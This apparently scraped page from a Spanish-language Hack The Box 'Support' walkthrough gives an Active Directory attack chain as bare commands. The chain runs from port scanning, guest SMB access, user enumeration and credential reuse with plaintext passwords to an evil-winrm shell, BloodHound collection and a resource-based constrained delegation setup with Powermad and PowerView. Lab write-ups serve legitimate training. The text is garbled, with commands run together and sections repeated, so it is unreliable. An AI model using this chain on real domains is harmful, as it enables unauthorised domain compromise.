Support
Resource-based Constrained Delegation
# Escaneo completo de todos los puertossudo nmap -sS -- min-rate 5000 -- open -vvv -n -Pn -p- 10.10.11.174-oG allPorts















📌 ¿Qué es ILSpy?


























Last updated
Resource-based Constrained Delegation
# Escaneo completo de todos los puertossudo nmap -sS -- min-rate 5000 -- open -vvv -n -Pn -p- 10.10.11.174-oG allPorts









































Last updated
nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49679,49702,49742
10.10.11.174 -oN targetedsmbclient //10.10.11.174/support-tools -U guest./Kerbrute userenum -d support.htb --dc 10.10.11.174 users kerbrute userenum -d support.htb --dc 10.10.11.174 /opt/SecLists/Usernames/xato-net-10-million-usernames-dup.txtnetexec smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'netexec winrm 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'rpcclient -U 'ldap%nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 10.10.11.174netexec smb 10.10.11.174 -u user -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --continue-on-successldapsearch -x -H ldap://10.10.11.174 -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"ldapsearch -x -H ldap://10.10.11.174 -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" | grep -i "samaccountname: support" -B 37netexec winrm 10.10.11.174 -u user -p 'Ironside47pleasure40Watchful' --continue-on-successevil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'*Evil-WinRM* PS C:\Users\support\tmp> ./SharpHound.exe -c AllImport-Module .\Powermad.ps1New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -VerboseImport-Module .\PowerView.ps1Get-DomainComputer SERVICEA$ComputerSid = Get-DomainComputer SERVICEA -Properties objectsid | Select -Expand objectsid$ComputerSid = Get-DomainComputer FAKECOMPUTER -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $targetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
#Check that it worked
Get-DomainComputer $targetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity'
msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}